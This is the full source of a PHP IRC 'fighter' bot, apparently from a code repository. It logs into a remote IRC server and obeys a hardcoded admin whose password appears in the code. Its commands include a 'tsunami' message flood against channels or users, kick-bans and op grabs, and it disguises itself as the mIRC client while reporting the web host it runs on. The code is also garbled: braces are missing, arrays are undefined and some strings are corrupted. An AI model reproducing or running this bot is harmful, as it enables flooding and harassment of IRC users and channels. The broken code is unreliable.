
641 lines
28 KiB
Raw Permalink Blame History

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//fighter script - ibli
function working() {
" ^^",
" :(",
" :)",
" ~:>",
" :P~",
" :D",
$nick = $nicky[rand(0,count($nicky) - 1)];
$awaymsg = " ";
$identify = '';
$Admin = 'dodolz';
$BOT_PASSWORD = 'servorum';
$channels = '#england';
$remotehst2= array("irc.telkom.net.id");
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = '6667';
$realname = $nick;
$counterfp = 0;
$channels = str_replace("CNL","#",$channels);
print "<body bgcolor=#000000 text=#C0C0C0>";
print "<b>== Connecting to $remotehost...</b>";
$raway = "on";
$log = "off";
$saway = "1";
if (!$stime) { $stime = time(); }
if (!$port) { $port = "6666"; }
$Admin = strtolower($Admin);
$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin"));
$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$keluar = 0;
$akill = 1;
$katime = 0;
$localhost = 'localhost';
$dayload = date("H:i:s d/m/Y");
ini_set('user_agent','MSIE 5\.5;');
define ('CRL', "\r\n");
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp+1;
else {
print "<br><b>Cannot connect to $remotehost!<br>Please Try Another Server!</b>";
$keluar = 1;
print "<br><b>== Suceeded connection</b>";
$Header = 'NICK '.$nick . CRL;
$Header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $Header);
$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 1024);
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$dFrom = substr($data,1,$offsetA-1);
$offsetB = strpos($data, ' :');
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$offsetC = strpos($data, '!');
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL);
foreach ($channel as $v) {
fputs($fp, 'JOIN ' .$v . CRL);
$pong1 = '1';
elseif (substr($dCommand,0,3)=='465') {
print "<br><b>== This bot have been autokilled.</b>";
$akill = 2;
elseif (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
elseif (substr($dCommand,0,3)=='432') {
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
if (eregi('.dal.net',$dNick) && $akill==2) {
if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {
print "<br><b>".strstr($data,'***')." </b>";
if (eregi('Your IP is',$data)) {
$keluar = 1;
$dcom = explode(" ", $dCommand);
$dNick = strtolower($dNick);
if ($dcom[0]=='KICK' && $dcom[2]==$nick) {
fputs($fp, 'JOIN ' .$dcom[1]. CRL);
elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($dcom[0]=='NICK') {
$com = explode(" ", $data);
$chnick = strtolower(str_replace(':','',$com[2]));
if ($dNick!=$chnick) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL);
} else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); }
elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {
$dcom[2] = strtolower($dcom[2]);
if ($auth["$dcom[2]"]) {
if ($auth["$dcom[2]"]["pass"]) {
if ($auth["$dcom[2]"]["auth"]==1) {
$auth["$dcom[2]"]["auth"] = 2; $whois = "";
fputs($fp,'NOTICE ' . $dcom[2] . ' :kamu masukan password as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password oke bos aChOnGs seep emuach di titid! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
elseif ($dcom[0]=='NOTICE') {
$com = explode(" ", $data);
if ($com[3]==':_KB' && $com[4] && $com[5] && $com[6]) {
$msg = str_replace('_','',$data);
$msg = strstr($msg,":KB");
$msg = str_replace(":KB $com[4]","",$msg);
fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);
fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);
elseif ($dcom[0]=='PRIVMSG') {
$com = explode(" ", $data);
if ($com[3]==':_VERSION_') {
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION mIRC v6.16 Khaled Mardam-Bey'.chr(1) . CRL);
elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==1) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["auth"] = 2;
fputs($fp,'NOTICE ' . $dNick . ' :kamu masukkan password as '.$auth["$dNick"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :passworde salah syu! Auth salah Shu! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos aChOnGs emang oke! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {
if ($auth["$dNick"]) {
if (!$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[4];
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Already Set! Type: auth <your pass> To Get Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($com[5]=="master" || $com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser <nick> <master/user> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if (!$auth["$com[4]"]) {
if ($com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass33] <Spyderur Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: adduser <nick> user ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if ($auth["$com[4]"]["status"]=="user") {
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
elseif ($auth["$dNick"]["status"]) {
if (ereg(":`",$com[3]) || ereg(":!",$com[3])) {
$chan = strstr($dCommand,"#");
$anick = str_replace("PRIVMSG ","",$dCommand);
if ($com[3]==':!auth') {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'NOTICE '.$dNick.' :Jembutz..! You`re already Authorized!' . CRL);
} else {
$whois = $dNick;
fputs($fp,'WHOIS '.$dNick . CRL);
} elseif ($com[3]==':`auth' && $chan) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Hamba siap mencari janda Bos!' . CRL);
} else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Raimu bukan bosku cok!' . CRL); }
} elseif ($auth["$dNick"]["auth"]==2) {
if ($com[3]==':`say' && $com[4] && $chan) {
$msg = strstr($data,":`say");
$msg = str_replace(":`say ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);
elseif ($com[3]==':`act' && $com[4] && $chan) {
$msg = strstr($data,":`act");
$msg = str_replace(":`act ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :_ACTION '.$msg.'_'. CRL);
elseif ($com[3]==':`slap' && $com[4] && $chan) {
fputs($fp,'PRIVMSG '.$chan.' :_ACTION slaps '.$com[4].' Jembut Raimu wani karo bosku around a bit with a large trout_'. CRL);
elseif ($com[3]==':`msg' && $com[4] && $com[5]) {
$msg = strstr($data,":`msg");
$msg = str_replace(":`msg $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);
elseif ($com[3]==':`notice' && $com[4] && $com[5]) {
$msg = strstr($data,":`notice");
$msg = str_replace(":`notice $com[4] ","",$msg);
fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);
elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) {
$msg = strstr($data,":`ctcp");
$msg = str_replace(":`ctcp $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :_'.$msg.'_'. CRL);
elseif ($com[3]==':`ping' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PONG!_ '.$sml. CRL);
elseif ($com[3]==':`pong' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PING!_ '.$sml. CRL);
elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bphp = $_SERVER['PHP_SELF'];
fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL);
elseif ($com[3]==':`up' && $chan) {
fputs($fp, 'PRIVMSG chanserv@services.dal.net :op '.$chan.' '.$nick . CRL);
elseif ($com[3]==':`down' && $chan) {
fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
if (substr($dCommand,0,3)=='433') {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
$msg = strstr($data,":`tsunami");
$msg = str_replace(":`tsunami $com[4]","",$msg);
if (ereg("#", $com[4])) {
fputs($fp, 'JOIN '.$com[4] . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :_TSUNAMI _'.$msg.'_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :_FLOOD _'.$msg.'_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
if (ereg("#", $com[4])) {
fputs($fp, 'PART '.$com[4].' :Complete' . CRL);
fputs($fp, 'NICK '.$nick . CRL);
} else {
fputs($fp, 'NICK '.$nick . CRL);
elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {
$msg = strstr($data,":`cycle");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`cycle $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`cycle","",$msg);
if (strlen($msg)<3) {
$msg = '';
fputs($fp, 'PART '.$partchan.' :_'.$msg . CRL);
fputs($fp, 'JOIN '.$partchan . CRL);
elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`part");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`part $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`part","",$msg);
if (strlen($msg)<3) {
$msg = '';
fputs($fp, 'PART '.$partchan.' :_'.$msg . CRL);
$remchan = strtolower($partchan);
if (in_array($remchan, $channel)) {
$channels = str_replace("$remchan ","",$channels);
$channel = explode(" ", $channels);
foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; }
$addchan = strtolower($com[4]);
if (!in_array($addchan, $channel)) {
$channels.="$addchan ";
foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
$nick = $com[4];
$identify = $com[5];
fputs($fp, 'NICK '.$nick . CRL);
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
elseif ($com[3]==':`k' && $com[4] && $chan) {
$msg = strstr($data,":`k");
$msg = str_replace(":`k $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
elseif ($com[3]==':`kb' && $com[4] && $chan) {
$msg = strstr($data,":`kb");
$msg = str_replace(":`kb $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
elseif ($com[3]==':`ganti') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
if (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
elseif ($com[3]==':`op' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
elseif ($com[3]==':`deop' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
elseif ($com[3]==':`v' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
elseif ($com[3]==':`dv' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`awaymsg");
$msg = str_replace(":`awaymsg","",$msg);
if (strlen($msg)<3) {
fputs($fp,'AWAY : ' . 'AWAY' . CRL);
} else {
fputs($fp,'AWAY : ' . $msg . CRL);
elseif ($com[3]==':`mode' && $com[4] && $chan) {
fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
elseif ($com[3]==':`nickmode' && $com[4]) {
$nickmode = $com[4];
fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
elseif ($com[3]==':`chanlist') {
fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
elseif ($com[3]==':`userlist') {
foreach ($auth as $user) {
if ($user["pass"]) { $pass="-pass ok"; }
else { $pass="-no pass"; }
$userlist .= $user["name"].'('.$user["status"].$pass.') ';
fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`quit");
$msg = str_replace(":`quit","",$msg);
if (strlen($msg)>3) {
$msg = str_replace(" ","_",$msg);
$quit1 = array("ngantor","nguantuk","sama","brb","bye_all","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart");
$quitmsg = $quit1[rand(0,count($quit1) - 1)];
fputs($fp, 'QUIT ' . $quitmsg . CRL);
$keluar = 1;
elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {
if (!eregi(".dal.net",$com[4])) {
$remotehost = "irc.dal.net";
} else { $remotehost = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT changging_server' . CRL);
elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$username = $username;
} else { $username = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_ident' . CRL);
elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$realname = "--";
} else { $realname = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_fullname' . CRL);
elseif ($com[3]==':`topic' && $com[4] && $chan) {
$msg = strstr($data,":`topic");
$msg = str_replace(":`topic ","",$msg);
fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
elseif ($com[3]==':!help' && !$chan) {
fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);
} else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth <your pass> To Authorized '. CRL); }
elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) {
if (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '. $Admin .' :_4inviter: ' . $dFrom . '_2:' .$iText. CRL);
$inv = strstr($dFrom,'@');
foreach ($auth as $user) {
if ($user["status"]=="user") {
fputs($fp, 'NOTICE '.$user["name"].' :_KB '.$chan.' '.$dNick.' '.$inv.'_' . CRL);
elseif (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '.$Admin.' :_6' . $dFrom . '_12:' .$iText. CRL);
elseif (substr($data,0,4) == 'PING') {
fputs($fp,'PONG ' . substr($data,5) . CRL);
$smile = $querym[rand(0,count($querym) - 1)];
$kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL);
fclose ($fp);
} while ($keluar==0);